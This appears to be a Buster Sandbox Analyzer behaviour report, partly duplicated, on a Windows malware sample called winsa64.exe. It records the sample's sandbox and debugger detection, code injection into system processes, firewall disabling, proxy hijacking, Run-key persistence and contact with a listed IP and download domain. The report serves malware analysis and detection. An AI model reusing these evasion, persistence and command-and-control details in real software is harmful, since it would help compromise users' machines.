   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Anti-Malware Analyzer routine: WinDbg detection.
   * Anti-Malware Analyzer routine: Sandboxie detection.
   * Creates an event named "ShellCopyEngineRunning".
   * Creates an event named "ShellCopyEngineFinished".
   * Creates a mutex "INSONIA".
   * Creates a mutex "HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}".
   * Creates a mutex "MSCTF.Shared.MUTEX.EBH".
   * Opens a service named "AudioSrv".
   * Creates a mutex "MidiMapper_modLongMessage_RefCnt".
   * Creates a mutex "MidiMapper_Configure".
   * Enumerates running processes.
   * Creates process "(null),C:\WINDOWS\system32\dwwin.exe -x -s 456,C:\WINDOWS\system32".
   * Injects code into process "c:\windows\system32\dwwin.exe".
   * Creates a mutex "SHIMLIB_LOG_MUTEX".
   * Creates a mutex "Local\_!MSFTHISTORY!_".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!".
   * Creates a mutex "Local\c:!documents and settings!r32!cookies!".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!historial!history.ie5!".
   * Creates a mutex "RasPbFile".
   * Lists all entry names in a remote access phone book.
   * Opens a service named "RASMAN".
   * Opens a service named "Sens".
   * Injects code into process "c:\windows\system32\drwtsn32.exe".
   * Creates an event named "DbgEngEvent_00000550".
   * Injects code into process "c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe".
   * Terminates process "à?¤\dee\harskvol1\do".
   * Contains string Anubis detection routine found ("76487-337-8429955-22614")
   * Contains string Sandboxie detection routine found ("SbieDll.dll")
Extrayendo información de mis sistema:

Report generated with Buster Sandbox Analyzer 1.85 at 12:31:20 on 08/02/2013

Detailed report of suspicious malware actions:

Anubis detection routine found
Checked for debuggers
Created a mutex named: CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}
Created a mutex named: INSONIA
Created a mutex named: Local\_!MSFTHISTORY!_
Created a mutex named: Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!
Created a mutex named: Local\c:!documents and settings!r32!configuración local!historial!history.ie5!
Created a mutex named: Local\c:!documents and settings!r32!cookies!
Created a mutex named: MidiMapper_Configure
Created a mutex named: MidiMapper_modLongMessage_RefCnt
Created a mutex named: MSCTF.Shared.MUTEX.EBH
Created a mutex named: RasPbFile
Created a mutex named: SHIMLIB_LOG_MUTEX
Created file in defined folder: C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\drwtsn32.log
Created file in defined folder: C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\user.dmp
Created process: (null),C:\WINDOWS\system32\dwwin.exe -x -s 456,C:\WINDOWS\system32
Defined file type created in Windows folder: C:\WINDOWS\winsa64.exe
Defined registry AutoStart location created or modified: machine\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\DisableNotifications = 00000001
Defined registry AutoStart location created or modified: machine\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\DisableNotifications = 00000001
Defined registry AutoStart location created or modified: machine\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = 00000001
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\Run\winsa64 = 43003A005C00570049004E0044004F00570053005C00770069006E0073006100360034002E006500780065000000
File copied itself
Firewall settings change: machine\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\enablefirewall = empty value key
Got computer name
Got system default language ID
Got user name information
Internet connection: C:\WINDOWS\winsa64.exe Connects to "212.1.208.24" on port 80 (TCP - HTTP)
Listed all entry names in a remote access phone book
Modified file in defined folder: C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat
Modified file in defined folder: C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat
Modified file in defined folder: C:\Documents and Settings\r32\Cookies\index.dat
Queried DNS: google.bg
Queried DNS: google.by
Queried DNS: google.co.uk
Queried DNS: google.es
Queried DNS: google.kz
Queried DNS: google.net
Queried DNS: google.pt
Queried DNS: s3.amazonaws.com
Queried DNS: solutionfinder.microsoft.com
Queried DNS: www.cadastramento.net
Queried DNS: www.chabvf.info
Queried DNS: www.itjdcryfa.info
Queried DNS: www.yoeqtxutb.info
Queried DNS: www3.nationalgeographic.com
Sandboxie detection routine found
Terminated process: à?¤\dee\harskvol1\do
Transfered files from and/or to internet

 Report generated with Buster Sandbox Analyzer 1.85 at 12:31:20 on 08/02/2013

 [ General information ]
   * File name: c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe

 [ Changes to filesystem ]
   * Creates file C:\WINDOWS\winsa64.cfg
   * Creates file C:\WINDOWS\winsa64.exe
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\drwtsn32.log
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\user.dmp
   * Modifies file C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat
   * Modifies file C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat
   * Modifies file C:\Documents and Settings\r32\Cookies\index.dat

 [ Changes to registry ]
   * Modifies value "NumberOfCrashes=00000003" in key HKEY_LOCAL_MACHINE\software\microsoft\DrWatson
          old value "NumberOfCrashes=00000002"
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Creates value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
   * Creates value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile
   * Modifies value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
          old value empty
   * Empties value "EnableFirewall" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
         old value "EnableFirewall=00000001"
   * Modifies value "ProxyEnable=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
          old value empty
   * Creates value "ProxyServer=3100320037002E0030002E0030002E0031003A0039003600360036000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
                    binary data=127.0.0.1:9666
   * Modifies value "ProxyOverride=3100320037002E0030002E0030002E0031000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
                       binary data=127.0.0.1
          old value "ProxyOverride=6C006F00630061006C000000"
                       binary data=local
   * Creates Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013020720130208
   * Creates Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013020820130209
   * Modifies value "SavedLegacySettings=46000000B9010000030000000E0000003132372E302E302E313A39363636090000003132372E302E302E3100000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
          old value "SavedLegacySettings=46000000BA0100000100000000000000050000006C6F63616C00000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000"
   * Creates value "winsa64=43003A005C00570049004E0044004F00570053005C00770069006E0073006100360034002E006500780065000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Run
                binary data=C:\WINDOWS\winsa64.exe

 [ Network services ]
   * Looks for an Internet connection.
   * Queries DNS "www.cadastramento.net".
   * Queries DNS "www.chabvf.info".
   * Queries DNS "www.yoeqtxutb.info".
   * Queries DNS "www.itjdcryfa.info".
   * Queries DNS "solutionfinder.microsoft.com".
   * Queries DNS "s3.amazonaws.com".
   * Queries DNS "google.es".
   * Queries DNS "www3.nationalgeographic.com".
   * Queries DNS "google.bg".
   * Queries DNS "google.net".
   * Queries DNS "google.co.uk".
   * Queries DNS "google.kz".
   * Queries DNS "google.pt".
   * Queries DNS "google.by".
   * C:\WINDOWS\winsa64.exe Connects to "212.1.208.24" on port 80 (TCP - HTTP).
   * Downloads file from "www.cadastramento.net/sistema.html".

 [ Process/window/string information ]
   * Enables process privileges.
   * Gets user name information.
   * Gets system default language ID.
   * Gets computer name.
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Anti-Malware Analyzer routine: WinDbg detection.
   * Anti-Malware Analyzer routine: Sandboxie detection.
   * Creates an event named "ShellCopyEngineRunning".
   * Creates an event named "ShellCopyEngineFinished".
   * Creates a mutex "INSONIA".
   * Creates a mutex "HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}".
   * Creates a mutex "MSCTF.Shared.MUTEX.EBH".
   * Opens a service named "AudioSrv".
   * Creates a mutex "MidiMapper_modLongMessage_RefCnt".
   * Creates a mutex "MidiMapper_Configure".
   * Enumerates running processes.
   * Creates process "(null),C:\WINDOWS\system32\dwwin.exe -x -s 456,C:\WINDOWS\system32".
   * Injects code into process "c:\windows\system32\dwwin.exe".
   * Creates a mutex "SHIMLIB_LOG_MUTEX".
   * Creates a mutex "Local\_!MSFTHISTORY!_".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!".
   * Creates a mutex "Local\c:!documents and settings!r32!cookies!".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!historial!history.ie5!".
   * Creates a mutex "RasPbFile".
   * Lists all entry names in a remote access phone book.
   * Opens a service named "RASMAN".
   * Opens a service named "Sens".
   * Injects code into process "c:\windows\system32\drwtsn32.exe".
   * Creates an event named "DbgEngEvent_00000550".
   * Injects code into process "c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe".
   * Terminates process "à?¤\dee\harskvol1\do".
   * Contains string Anubis detection routine found ("76487-337-8429955-22614")
   * Contains string Sandboxie detection routine found ("SbieDll.dll")